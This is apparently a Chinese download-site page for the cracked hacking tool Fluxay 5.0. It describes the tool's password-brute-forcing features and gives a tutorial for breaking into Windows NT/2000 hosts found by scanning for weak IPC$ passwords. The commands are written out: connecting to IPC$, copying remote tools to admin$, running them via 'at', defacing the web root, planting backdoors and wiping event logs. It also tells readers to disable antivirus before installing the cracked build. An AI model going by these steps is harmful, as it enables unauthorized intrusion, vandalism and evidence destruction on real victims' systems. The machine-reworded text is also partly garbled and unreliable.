流光Fluxay是中國第一代著名的黑客小榕的作品,一款絕好的ftp、pop3解密工具,界面豪華,功能強大,掃描系統(tǒng)服務(wù)器漏洞的利器。
流光5.0的破解可分為5大部分
一、POP3/FTP/…探測
二、IPC探測
三、SQL探測
四、高級掃描
因為開發(fā)時間的原因,上面的探測模式略有不同,所以分成了四個部分,本教程說的是第一個部分的探測。后面的探測模式應(yīng)該屬于流光5.0的高級應(yīng)用了:)
流光功能如下
1、用于檢測POP3/FTP主機中用戶密碼安全漏洞。
2、163/169雙通。
3、多線程檢測,消除系統(tǒng)中密碼漏洞。
4、高效的用戶流模式。
5、高效服務(wù)器流模式,可同時對多臺POP3/FTP主機進行檢測。
6、最多500個線程探測。
7、線程超時設(shè)置,阻塞線程具有自殺功能,不會影響其他線程。
8、支持10個字典同時檢測。
9、檢測設(shè)置可作為項目保存。
10、取消了國內(nèi)IP限制而且免費。
Fluxay5.0新增功能
1、加入了本地模式,在本機運行是不必安裝Sensor。
2、Sensor掃描臨時結(jié)果文件(*.PTR)的尺寸大約減少了10倍。
3、后臺掃描模式時,掃描的結(jié)果(*.PTR)可以直接通過附件發(fā)送到信箱。
4、Sensor的掃描速度加快。
5、減少了Sensor異常退出的BUG。
6、流光的界面和Sensor之間的通訊采用Triple-DES,密鑰的長度最多可到192bits,保證整個傳輸過程不可監(jiān) 聽。掃描的結(jié)果也只有在密鑰正確的情況下才可閱讀。
7、修正的控制服務(wù),新的控制服務(wù)在升級Sensor時不再會失敗。
8、Sensor的服務(wù)名稱可以任意指定,控制服務(wù)和Sensor的進程名稱也可以任意指定。
9、支持XP(本地模式),很快會有98/ME的版本。
如何去除FluXayⅣ的使用時間限制
1.修改文件法
首先說說怎樣解決流光Ⅳ過期的問題。使用流光Ⅳ之前,雙擊系統(tǒng)托盤中的時間,調(diào)出“日期/時間屬性”對話框,在這里把系統(tǒng)時間調(diào)整到2001年。然后下載16進制文件編輯器winhex,WinHex可以打開EXE和dll文件對其中的16進制代碼進行編輯修改。我們要用它來修改流光Ⅳ的主程序。下載之后,一路點擊“下一步”即可安裝完畢。
2.防火墻
如果你不喜歡自己動手修改軟件,那么還可以使用下面這個辦法去除流光Ⅳ的使用時間限制。安裝任意一款網(wǎng)絡(luò)防火墻,如天網(wǎng)防火墻。然后把系統(tǒng)日期調(diào)整為2001年,運行天網(wǎng)防火墻之后再運行流光Ⅳ,此時天網(wǎng)防火墻會報警兩次,我們要做的禁止它們通行就可以了。怎樣禁止?就是天網(wǎng)詢問是否讓其通過,請選擇“禁止”,并把“以后都按照這次的操作進行” 選上,則以后上網(wǎng)只要打開天網(wǎng)防火墻,無論怎樣流光Ⅳ都不會過期!
流光5.0破解版,安裝請看壓縮包里面的軟件說明!
PS:此位黑客工具,很多網(wǎng)友加我們的客服問為什么會被殺毒殺,因為殺毒軟件只要是黑客工具軟件都會判斷為病毒,所以請大家放心使用,使用前請最好關(guān)閉殺毒軟件!
使用教程
1、你要有流光5.0,這里我實驗用的是流光5.02001.FORWin2000漢化版。FORWin98的不能。由于IPC聯(lián)網(wǎng)控制是NT/2000給予的功效。并且流光5.0FOR2K規(guī)定你電腦操作系統(tǒng)的是NT/2000,不然流光5.0總結(jié)會不成功!什么叫IPC:
IPC就是指"InterProcessCommunications",確切地說是ipc$,是默認(rèn)在開機啟動時的admin分享。
IPC$是WindowsNT/2K中獨有的遠程網(wǎng)絡(luò)登錄作用,它的作用是在同一時間內(nèi),2個IP中間只可以建立一個聯(lián)接。
留意,你試圖用IPC$聯(lián)接會到EventLog中留有紀(jì)錄。無論也許你登錄成功。
能不能根據(jù)IPC$暴力破解密碼?完全可以!但是,是否太笨了點…
2、初次運行流光5.0,會看見登記注冊的界面,具體步驟請見自己第一篇實例教程。大家在主界面上能夠方法有哪些來根據(jù)IPC探測得到管理工作的管理權(quán)限。這兒我們要作的是獲得一臺梯子,那就可以用準(zhǔn)確率強的方法來探測了(檢測一堆IP來獲得弱口令)。
在主界面挑選探測→探測POP3/FTP/NT/SQL服務(wù)器選擇項,然后直接按Ctrl+R。
3、出先了上邊的懸浮窗口,鍵入我們要破譯的IP段,大家鍵入了來看一下。我們可以把“將FrontPage服務(wù)器全自動添加HTTP服務(wù)器目錄取消”。只要我們只想要得到IPC弱口令,這可以加速掃描儀速度:)填寫IP,挑選掃描儀NT/98服務(wù)器
4、探測中……
(留意如果你想要探測的是流光5.0保存的國內(nèi)IP段,會被禁止的,其實就是探測時公告欄發(fā)生"IP保存"字樣)
有遠程主機的管理密碼了,大家接下來就是想盡辦法操縱他了,有哪些找邦企么?)有的是!自己看看專用工具-菜單欄中的IIS遠程連接命令:)是否很容易呢,我以后在講,今日先訓(xùn)練net指令吧。
黑他!
開一個dosprompt實行如下所示指令,此次用的事例。
1、netuse\\另一方ip\ipc$"登陸密碼"/user:"登錄名"||創(chuàng)建遠程桌面連接
2、copyicmd.exe\\另一方ip\admin$||admin$是對方的winnt文件目錄)這兒文檔多。
3、nettime\\另一方IP||看一下對方本地時間
4、at\\另一方ip啟動程序的時間也啟動程序名啟動程序的主要參數(shù)||用at指令來定時啟動程序流程,在這兒大家用soon這一程序流程做還可以,它能夠替代3/4二步。
5、telnet另一方ip端口||
6、鍵入pass(要不是用icmd.exe,或沒有設(shè)定動態(tài)口令就不用了)||
7、在開一個對話框,再次copy我們用的東西。copysock.execopyntlm.execopycl.execlear.exe
假如我們真想黑他,只需要將我們自己的主頁文檔遮蓋目標(biāo)主頁就ok了,我們通過dir/sdefault.htm或是dir/sindex.htm來決定另一方頁面的才行,一般是在X:\interpub\wwwroot\.
倘若主頁文檔是default.htm而且在c:\interpub\wwwroot,那樣:copydefault.htm\\ip\c$\interpub\wwwroot
有演試
8、實際上黑人家是很低等而且沒意思的:(大家最好物有所有,做成梯子吧,將來干活兒便捷點:
實行大家copy以往的ntlm.exe,撤銷驗正。在給自己留點個側(cè)門,例如提高guest的管理權(quán)限,或者其他的側(cè)門專用工具,這種東西多了她選吧,看一下殺手copy的那堆東西:)
9、還可以制成其它的么?
當(dāng)然,只要是有時長,并愿意做,曾經(jīng)的我悄悄的將自己的首頁放進別人的server上,速度更快、空間無限,哈哈哈:)
10、日志消除,中斷連接:
實行大家copy以往的cl.execlear.exe都能夠消除日志,例如clearall:清除所有的日志。之后在中斷連接:netuse\\ip\ipc$/delete
解壓密碼:www.kkx.net
下一篇:.cr2文件打開軟件